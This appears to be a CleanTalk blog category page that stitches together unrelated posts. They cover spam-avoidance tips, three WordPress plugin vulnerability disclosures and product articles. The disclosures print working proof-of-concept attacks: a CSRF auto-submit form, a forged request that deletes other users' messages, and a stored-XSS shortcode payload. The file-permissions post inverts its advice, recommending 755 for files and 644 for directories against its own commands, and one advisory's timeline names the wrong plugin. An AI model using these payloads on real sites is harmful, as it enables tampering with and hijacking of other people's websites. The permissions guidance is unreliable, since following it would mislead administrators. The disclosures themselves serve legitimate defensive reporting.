Category: Uncategorized

MailChimp users often find that emails from their email newsletters end up in spam. The emails themselves, the headers and the text are fine, but still for some reason the emails end up in spam. Let’s try to figure out what the reason might be.

 

Why email from MailChimp going to spam

• Exclamation points or certain phrases in the subject line
  E.g. “Make money”, “F r e e”, “Not spam” and many others. Try to avoid using triggering phrases like these ones.
  
  
• The Unsubscribe Button is missed
  Always remember, that in case the email is not relevant to the mailing recipient and there is no Unsubscribe button, then the only way for the recipient to stop getting the email is to mark it as spam.
  
  
• Irrelevant offer
  In case several people mark your email as spam, other emails can end up in the spam folder as well.
  
  
• Blacklisted or unreal email in your email list
  Having blacklisted and unreal emails in your email list can be recognized by spam filters and put your emails at risk of going into the spam folder. In the instructions below, we will tell you how to clean your mailing list of “bad” addresses.
  
  

 

How to keep MailChimp from going to spam

1. Go to SpamBots Check page, copy and paste the email list into the left field or you may upload the file using the Browse button on the right, and press the Submit button. You will need to register in order to check more than 5 emails, which takes about 30 seconds.

2. After that, you will see a list of checked emails with their results. Feel free to download CSV and JSON files or share a link to that check using the links on the upper right.

URL to results – share the check results or reset to full list, including both good and bad lists.
Good list – remove emails that are suspiciously active or invalid.
Bad list – leave only email that are suspiciously active or invalid.
Copy – copy the entire list of emails.
CSV – download results of the check in CSV-file.
JSON – download results of the check in JSON-file.

3. Go to CSV or JSON file and copy only emails, that are not blacklisted.

4, Go to your MailChimp newsletter, paste the list in there, and press the Continue to organize button.

5. After that, continue creating your MailChimp newsletter as usual.

Using only verified emails will help you avoid MailChimp going to spam and get more of your newsletter emails delivered and opened. And don’t forget to verify all your email lists to reduce the chances of your emails ending up in spam. Email verification not only allows assistance in cleaning email lists to increase email deliverability and engagement rates.

In our quest for a secure WordPress environment, a significant discovery has emerged. The POEditor plugin, a powerful translation tool, harbors a critical vulnerability. Prior to version 0.9.8, the absence of Cross-Site Request Forgery (CSRF) protection has exposed the plugin to potential manipulation by attackers.

Main info:

CVE	CVE-2023-4209
Plugin	POEditor
Critical	Medium
Publicly Published	August 7, 2023
Last Updated	August 7, 2023
Researcher	Dmtirii Ignatyev
OWASP TOP-10	A2: Broken Authentication and Session Management
PoC	Yes
Exploit	Will be later
Reference	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4209 https://wpscan.com/vulnerability/b2c6fa7d-1b0f-444b-8ca5-8c1c06cea1d9
Plugin Security Certification by CleanTalk

Timeline

July 14, 2023	Plugin testing and vulnerability detection in the POEditor plugin have been completed
July 14, 2023	I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing
August 3, 2023	The author has released a fix update
August 7, 2023	Registered CVE-2023-4209

Discovery of the Vulnerability

During a comprehensive assessment of the POEditor plugin for WordPress, a medium vulnerability was uncovered. Versions prior to 0.9.8 lack Cross-Site Request Forgery (CSRF) checks in various critical areas. This oversight could potentially enable attackers to exploit logged-in administrator accounts, leading to unwanted actions, including the resetting of the plugin’s settings and unauthorized updates to its API key through CSRF attacks.

Understanding of CSRF (Cross-Site Request Forgery) attack’s

Cross-Site Request Forgery (CSRF) is a type of attack where an attacker tricks a user into performing actions they didn’t intend to, often in the context of an authenticated session. In the case of the POEditor plugin, the absence of CSRF checks exposes administrators to potential manipulation by malicious actors who can initiate actions without their knowledge.

Exploiting the CSRF (Cross-Site Request Forgery) vulnerability

By exploiting the lack of CSRF protection, attackers can create scenarios where logged-in administrators unwittingly trigger actions on the POEditor plugin. Through carefully crafted links or malicious code on websites, attackers can remotely reset the plugin’s settings and alter its API key, ultimately compromising the plugin’s functionality.

POC html code:

<html>

  <body>

  <script>history.pushState(”, ”, ‘/’)</script>

    <form action=”http://your_host/wordpress/wp-admin/tools.php”>

      <input type=”hidden” name=”page” value=”poeditor” />

      <input type=”hidden” name=”do” value=”clean” />

      <input type=”submit” value=”Submit request” />

    </form>

    <script>

      document.forms[0].submit();

    </script>

  </body>

</html>

Potential Risks and Real-World Impact

The CSRF vulnerability in the POEditor plugin presents several potential risks and scenarios:

1. Plugin Functionality Disruption:
   Attackers can render the plugin non-functional by resetting its settings and invalidating its API key, causing site administrators to lose valuable translation management capabilities.
   
2. Unauthorized Data Access:
   Malicious actors could exploit CSRF attacks to gain unauthorized access to sensitive translation-related data, potentially exposing private information.
   
3. Manipulation of Plugin Behavior:
   Attackers might tamper with the plugin’s settings or configuration, leading to erratic behavior or undermining the intended functionality of the plugin.

Recommendations for Improved Security

To mitigate the risks associated with this vulnerability and enhance overall security, the following measures are strongly advised:

• Update the Plugin:
  Promptly update the POEditor plugin to version 0.9.8 or higher, ensuring that the vulnerability is patched.
  
• Implement CSRF Protection:
  Developers should incorporate robust CSRF protection mechanisms, such as nonces or token-based authentication, to prevent unauthorized actions.
  
• Regular Security Audits:
  Conduct regular security assessments and penetration tests on WordPress installations to identify and remediate potential vulnerabilities proactively.
  
• User Awareness:
  Educate administrators about the risks of clicking on unknown links or visiting suspicious websites, emphasizing the importance of vigilance.
• 
  

By addressing the CSRF vulnerability in the POEditor plugin and adhering to these security recommendations, website owners can fortify their translation management system, prevent unauthorized actions, and maintain a secure and functional WordPress environment.

Use CleanTalk solutions to improve the security of your website

Dmitrii i.

If you think your website is infected and you need help, contact us for malware cleanup. Our specialists will provide you with professional assistance in cleaning your website from malware.

Check my website

In a recent round of intensive plugin testing, a concerning security flaw has come to light. The All Users Messenger plugin, a widely used communication tool for WordPress, harbors a significant Insecure Direct Object Reference (IDOR) vulnerability.

Main info:

CVE	CVE-2023-4023
Plugin	All Users Messenger
Critical	Medium
Publicly Published	August 7, 2023
Last Updated	August 7, 2023
Researcher	Dmtirii Ignatyev
OWASP TOP-10	A5: Broken Access Control
PoC	Yes
Exploit	Will be later
Reference	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4023 https://wpscan.com/vulnerability/682c0226-28bd-4051-830d-8b679626213d
Plugin Security Certification by CleanTalk

Timeline

July 25, 2023	Plugin testing and vulnerability detection in the Simple Blog Card plugin have been completed
July 25, 2023	I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing
July 26, 2023	The author closed his plugin and did not fix the vulnerability
August 7, 2023	Registered CVE-2023-4023

Discovery of the Vulnerability

During a meticulous examination of the All Users Messenger plugin for WordPress, an internal vulnerability was unearthed, specifically affecting versions up to 1.24. The vulnerability involves a significant oversight that permits non-administrator users to delete messages from the all-users messenger, potentially leading to unauthorized data manipulation.

Understanding of IDOR (Insecure Direct Object Reference)

Insecure Direct Object Reference (IDOR) is a security vulnerability that arises when an application does not sufficiently verify user access rights before allowing access to certain resources or functionalities. In the case of the All Users Messenger plugin, the absence of proper access checks enables unauthorized users to delete messages that they should not have permission to manipulate.

Exploiting the IDOR (Insecure Direct Object Reference) vulnerability

By leveraging the lack of adequate access control, a non-administrator user with subscriber-level privileges can manipulate the plugin’s message deletion functionality to remove messages that belong to other users. This can potentially disrupt communication, lead to data loss, and compromise the integrity of the messaging system.

POC request:

POST /wordpress/index.php?rest_route=%2Frf%2Fall_users_messenger_view_api%2Ftoken&_locale=user HTTP/1.1
Host: your_host
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json, /;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://your_host/wordpress/wp-admin/admin.php?page=AllUsersMessenger
X-WP-Nonce: 5e42638171
Content-Type: application/json
Origin: http://your_host
Content-Length: 81
Connection: close
Cookie: cookie of low privilege user
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

{“userid”:1,”delete”:{“1690260984”:true,”1691465801″:true},”submit_delete”:true}

This shortcode can be inserted into a new post

Potential Risks and Real-World Impact

A subscriber-level user is able to exploit this vulnerability by tampering with message deletion requests, allowing them to delete messages from the all-users messenger that they should not have the authority to modify.

1. Unauthorized Data Manipulation:
   Attackers could maliciously delete important messages, leading to information loss and potential disruption of communication among users.
   
2. Privacy Breach:
   Sensitive or private messages could be deleted by unauthorized users, potentially violating user privacy and confidentiality.
   
3. Content Tampering:
   By exploiting the vulnerability, attackers might alter or delete critical messages, affecting the authenticity and reliability of communication.

Recommendations for Improved Security

To mitigate the risks associated with this vulnerability and enhance overall security, the following measures are strongly advised:

• Immediate Plugin Delete:
  Website administrators should delete the All Users Messenger
  
• Access Control Validation:
  Developers should conduct rigorous access control checks to ensure that users have the appropriate authorization before allowing them to modify or delete messages.
  
• Regular Security Audits:
  Conduct regular security assessments and penetration tests on WordPress installations to identify and remediate potential vulnerabilities proactively.
  
• User Privilege Restriction:
  Implement strict access controls to ensure that users can only access information that they are authorized to view based on their roles and permissions.
  
• Least Privilege Principle:
  Implement the principle of least privilege, granting users only the permissions necessary for their intended tasks.
  
  

By addressing the IDOR vulnerability in the All Users Messenger plugin and adopting these security recommendations, website owners can fortify their messaging systems, preserve data integrity, and create a safer environment for communication among users.

Use CleanTalk solutions to improve the security of your website

Dmitrii i.

If you think your website is infected and you need help, contact us for malware cleanup. Our specialists will provide you with professional assistance in cleaning your website from malware.

Check my website

In our recent in-depth security analysis of the widely used Simple Blog Card plugin for WordPress, a concerning vulnerability has come to light. Versions prior to 1.31 have a critical flaw, leaving your website exposed to potential Stored Cross-Site Scripting (XSS) attacks!

Main info:

CVE	CVE-2023-4035
Plugin	Simple Blog Card
Critical	High
Publicly Published	August 2, 2023
Last Updated	August 2, 2023
Researcher	Dmtirii Ignatyev
OWASP TOP-10	A7: Cross-Site Scripting (XSS)
PoC	Yes
Exploit	Will be later
Reference	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4035 https://wpscan.com/vulnerability/8fd9192a-2d08-4127-adcd-87fb1ea8d6fc
Plugin Security Certification by CleanTalk

Timeline

July 31, 2023	Plugin testing and vulnerability detection in the Simple Blog Card plugin have been completed
July 31, 2023	I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing
August 1, 2023	The author has eliminated the vulnerability and patched his plugin
August 2, 2023	Registered CVE-2023-4035

Discovery of the Vulnerability

During a comprehensive security assessment of the Simple Blog Card plugin for WordPress, an alarming vulnerability was discovered in versions prior to 1.31. The plugin fails to validate and escape some of its shortcode attributes before rendering them on a page or post. This oversight can potentially enable users with the contributor role and above to execute Stored Cross-Site Scripting (XSS) attacks.

Understanding Cross-Site Scripting (XSS)

Cross-Site Scripting (XSS) is a dangerous attack that allows attackers to inject malicious scripts into web pages, affecting other users who visit the compromised page. In this context, attackers can exploit the Simple Blog Card plugin by embedding specially crafted shortcodes on a new page and submitting it for review by an administrator. When the administrator approves the page, the stored XSS attack is executed, and the consequences can be severe.

Exploiting the Stored Cross-Site Scripting (XSS) vulnerability

An attacker creates a seemingly harmless blog post containing a Simple Blog Card shortcode with malicious script injections. When an unsuspecting administrator approves the post, the malicious scripts execute within the browser of anyone viewing the page, leading to unauthorized data access, cookie theft, or other harmful actions.

POC shortcode:

[simpleblogcard url=”http://***.*/” color=’red;” onmouseover=”alert(111111)”‘]

This shortcode can be inserted into a new post

Potential Risks and Real-World Impact

The XSS vulnerability in the Simple Blog Card plugin poses serious risks to both website administrators and visitors. Some potential real-world scenarios include:

1. Unauthorized Data Access:
   Attackers could exploit the XSS vulnerability to steal sensitive user data, such as login credentials or personal information.
   
2. Cookie Theft:
   Malicious scripts could hijack user cookies, leading to unauthorized access to user accounts or session hijacking. After account takeover attacker can insert malicious PHP code on page and it will be RCE.
   
3. Malicious Content Distribution:
   Attackers might use the vulnerability to inject harmful content or links into the website, potentially damaging the site’s reputation or spreading malware.

Recommendations for Improved Security

To mitigate the risks associated with this vulnerability and enhance overall security, the following measures are strongly advised:

• Immediate Plugin Update:
  Website administrators should update the Simple Blog Card plugin to version 1.31 or higher, which addresses the XSS vulnerability.
  
• Input Validation and Escaping:
  Plugin developers must implement robust input validation and escaping mechanisms to ensure that all user-generated content, including shortcodes, is properly sanitized before rendering on the page.
  
• Regular Security Audits:
  Conduct regular security assessments and penetration tests on WordPress installations to identify and remediate potential vulnerabilities proactively.
  
• User Privilege Restriction:
  Implement strict access controls to ensure that users can only access information that they are authorized to view based on their roles and permissions.
  
• User Awareness:
  Educate website administrators and users about the risks of sharing sensitive information and the importance of strong, unique passwords.
  
  

By addressing the XSS vulnerability in the Simple Blog Card plugin and adhering to these security recommendations, website owners can protect their systems from malicious attacks, safeguard user data, and preserve the integrity of their websites. Stay safe and secure in the ever-evolving digital landscape!

Use CleanTalk solutions to improve the security of your website

Dmitrii i.

If you think your website is infected and you need help, contact us for malware cleanup. Our specialists will provide you with professional assistance in cleaning your website from malware.

Check my website

Email Checker is an important tool that helps to verify the legitimacy of email addresses. Email Checker is a software tool that checks the validity of an email address in real-time. This ensures that emails are not only sent but also delivered to the intended recipients. Email addresses validation, on the other hand, is a process of verifying the email address using several methods, such as syntax checks, MX record checks, and email filtering. These checks help in reducing the likelihood of invalid email addresses being added to your mailing lists, further reducing the number of bounced emails and the potential of spam complaints.

A very large number of websites use subscription forms for updates, user registrations or order/checkout forms. Website owners use the email addresses of their clients for newsletter mailing lists. The same forms are also often being used by spam bots in spam purposes, so if the form is not protected, then spam email addresses will be added to the mailing list.

CleanTalk Anti-Spam Service provides tools for checking email addresses for existence. If you are using any of the CleanTalk Anti-Spam plugins, email address checking is being done automatically and non-existent email addresses will be blocked. How to install the CleanTalk Anti-Spam plugin on a website can be found on our help pages, here are our detailed guides for popular CMS: https://cleantalk.org/help/install 

CleanTalk also provides access to the Online Email Checker Service: https://cleantalk.org/email-checker . You can go to the verification page and enter the email address you want to check and get the result whether this address exists or not.

Email communication has become one of the most critical ways of exchanging information in today’s digital world. Whether for business purposes or personal communication, sending emails has become a necessary part of our daily life. However, sending emails to invalid email addresses can be counterproductive. 

How to reduce the risk of sending emails to fake addresses

Sending emails to invalid or fake email addresses can be counterproductive. It can lead to a high bounce rate, reducing email engagement, impact sender reputation and even result in email accounts being marked as spam. Email servers may consider emails that were sent to fake email addresses as spam and report it as such. This can lead to the email account being marked as spam, which can have negative consequences for the sender.

The use of the CleanTalk Email Checker and Email Validation tools can help with reducing the likelihood of these issues and ensure that emails are delivered to the appropriate recipients.

Security Firewall for WordPress websites is a tool that helps in protecting your website from hacking and other cyber attacks. In today’s world, hackers can attack websites using a variety of tools and methods. The CleanTalk Security Firewall blocks malicious attacks such as SQL injections, malware scripts, and more.

There are many threats that can hit a website and the CleanTalk Security Firewall is an important and necessary security measure. This tool offers a number of features that keeps your site secure. Here are a few reasons why the CleanTalk Security Firewall is essential for your WordPress site.

How to install the CleanTalk Security Plugin on your site: https://cleantalk.org/help/install-wordpress-security 

1. The CleanTalk Database of Dangerous IP Addresses is being used to protect against malicious attacks.
   CleanTalk uses its own database that contains dangerous IP addresses other sites were attacked with. This database is constantly updated and contains a list of known IP addresses activities of which are associated with unwanted activities such as spam, brute-force, hacks and other types of cyber attacks.
   
   When a user visits a site, CleanTalk automatically checks the user’s IP address for suspicious activities in the database. If the address is found, CleanTalk denies access to the site or blocks any attempts of sending inappropriate content to the site.
   Thus, the Database of Dangerous IP Addresses helps in preventing attacks and protects websites from unwanted actions, which makes CleanTalk an effective tool for protecting web resources.

2. Web Application FireWall is a part of the CleanTalk Security FireWall and it is designed for blocking attack attempts such as XSS, MySQL-injections, attempts to upload malicious files and check traffic for known exploits.
   WordPress is one of the most popular Content Management Systems (CMS) and web application vulnerabilities can be used to hack a site or steal sensitive information such as logins and passwords.
   Web Application Firewall for WordPress enhances website security and protects your website from potential security threats and data loss.
   
   
   
3. Security FireWall Log to monitor entire activity on the site. The Security FireWall Log shows all visits to the site and you can see the details about which IP addresses and which pages were visited, the number of requests made to the site, the geo location of the IP address and the User Agent used.
   
   
   Using this data, you can determine the IP addresses that generate a large number of requests to the site or visit non-existent pages of the site, then you can blacklist or whitelist the IP address.
   All Security FireWall Logs are stored in your CleanTalk Dashboard and kept for 7 days. You can use various filters to evaluate the activity of IP addresses on the site, get data for the last 7 days and add entries to your Personal Lists.
   

All in all, Security Firewall is an essential security measure for your WordPress site. It offers many features that keep your website protected from various types of cyber attacks. It’s a good practice to use the CleanTalk Security Firewall for protecting your data and keeping your site secure.

You can view information about CleanTalk Security Plugin in the WordPress directory: https://cleantalk.org/help/install-wordpress-security 

How to install the CleanTalk Security Plugin on your site: https://cleantalk.org/help/install-wordpress-security 

The CleanTalk company informs you, our clients, that starting on December 12, 2022, we will stop providing and supporting the Anti-Spam service for Shopify.

The CleanTalk Anti-Spam service for Shopify was launched for testing the anti-spam protection features for free. To our regret we can not provide our full protection because of technical limitations.

The Shopify system limits app developers and there are no tools to use our own JavaScript code as well as no access to receive other technical parameters of websites. This is the reason why our service can not collect necessary parameters for the full protection from spam so the CleanTalk service works only partially and for now it’s impossible to implement the anti-spam protection for some website forms.

On December 12, 2022 our Anti-Spam plugin for Shopify will stop functioning, therefore we recommend deleting it and installing another app.

We hope for your understanding and if situation changes then we will come back to developing and supporting our fully functional protection from spam for Shopify.

We appreciate that you were with us and trusted us to protect your websites!

If you have any questions, please send us a ticket.

Website Security plugin now automatically scans your WordPress files and folders for unsafe permissions and recommends how to change them if necessary.

What are WordPress File Permissions

WordPress file permissions protect your site’s files and directories from unauthorized access by hackers. Securing the proper permissions adds security to your site and makes it less vulnerable.

There are 3 types of file permissions in WordPress: read, write, and execute and are denoted in 2 ways. One of them is numerical.

Permission	What it means	Denotion
Read	User can view the contents of a file or directory, but not change anything	4
Write	User allowed to modify the contents of a file or directory, but not execute it	2
Execute	User allowed to run script files, or run scripts inside a directory	1
No permission	User has no access to the file or directory	0

Also, there are 3 categories of roles: user owner (single account), group owner (a set of users), and world (every other user). So, in the numeric schema, the permission number is a sum of all available permissions for each role.  And here are 4 examples of how a file or folder permission is recognized by WordPress:

	User			Group			World
777	Read	Write	Execute	Read	Write	Execute	Read	Write	Execute
644	Read	Write	–	Read	–	–	Read	–	–
755	Read	Write	Execute	Read	–	Execute	Read	–	Execute
440	Read	–	–	Read	–	–	–	–	–

While 000 or 440 seem to be the safest file permissions, they are impractical. And as you can see 777 is very dangerous as it leaves the file or directory open to modification by any user.

How to scan my website for unsafe permissions

The Website Security plugin automatically scans your website every 24 hours and checks all the permissions of the files and folders. Here is a list of all the files the plugin checks.

/.htaccess
/index.php
/wp-config.php
/wp-admin
/wp-includes
/wp-content
/wp-content/themes
/wp-content/plugins
/wp-content/uploads

You can see the results of your last scan on the main page of the plugin: go to Settings → Security by CleanTalk in your side menu. When you enter this page, a scan is immediately started to give you the most up-to-date information about your site’s security.

If there are some unsafe permissions you will see the message:

Permissions for files and directories from the list are unsafe. We recommend change it to 755 for each file and 644 for each directory from the list.

In that case, follow the instructions in the message. It is always recommended 755 for files and 644 for directories.

How to change access rights (using Linux as an example)

The Linux permissions for all files in your WordPress base directory should be set to readable and writable by the owning user (you), and readable only by everyone else. This creates a baseline where the web server can read all files. It will need read access in order to serve static content like images, CSS and Javascript files. Unlike the method above we will be adjusting script permissions to be more stringent later on.

find </path/to/wordpress> -type f \-exec chmod 644 {} \;

If possible, the permissions for all files should be set to read and writable to your user, readable by the group, and no permissions for others. In some instances this may cause issues with other software or plugins, but it is possible to restrict these permissions in some instances.

Lockdown permissions for all PHP scripts so that only your user can read them. This is ideal because only your user should need to know the contents of scripts.

find </path/to/wordpress> -type f -name "*.php" \-exec chmod 640 {} \;

Also, feel free to use Security by CleanTalk plugin to check wp-content automatically on a daily basis.